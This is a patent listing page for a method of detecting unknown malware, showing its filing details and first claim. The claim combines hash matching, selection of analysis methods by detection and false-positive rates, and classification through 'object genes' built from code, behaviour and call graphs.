System and Method for Detecting Unknown Malware

  • US 20120174227A1
  • Filed: 07/26/2011
  • Published: 07/05/2012
  • Est. Priority Date: 12/30/2010
  • Status: Active Grant
First Claim
Patent Images

1. A computer-implemented method for detecting unknown malware, the method comprising:

  • generating a hash of an unknown object;

    comparing the hash of the unknown object with hashes of known clean and malicious objects;

    if the hash of the unknown object matches one of the hashes of either known clean or malicious objects, terminating analysis of the unknown object;

    if the hash of the unknown object does not match any hash of the known clean or malicious objects, selecting out of a plurality of different malware analysis methods at least two most effective malware analysis methods for further analysis of the unknown object for presence of malware, wherein the effectiveness of a malware analysis method is determined as a function of a level of successful malware detections of known malicious objects and a level of false positive detections of known clean objects by said malware analysis method;

    generating a different object gene of the unknown object for each of the two selected malware analysis methods, wherein an object gene is a data structure containing a plurality of information elements retrieved from or associated with the unknown object, and wherein an object gene for each malware analysis method is selected from unique lines of code of the unknown object gene, operational areas of the unknown object gene, execution path of the unknown object gene, behavior pattern of the unknown object gene, program flowchart of the unknown object gene, or function call graph of the unknown object gene;

    analyzing each generated object gene of the unknown object using the selected malware analysis methods; and

    determining if the unknown object is clean or malicious based on the results of the analysis of the generated object genes using the selected malware analysis methods.

View all claims
    ×
    ×

    Thank you for your feedback

    ×
    ×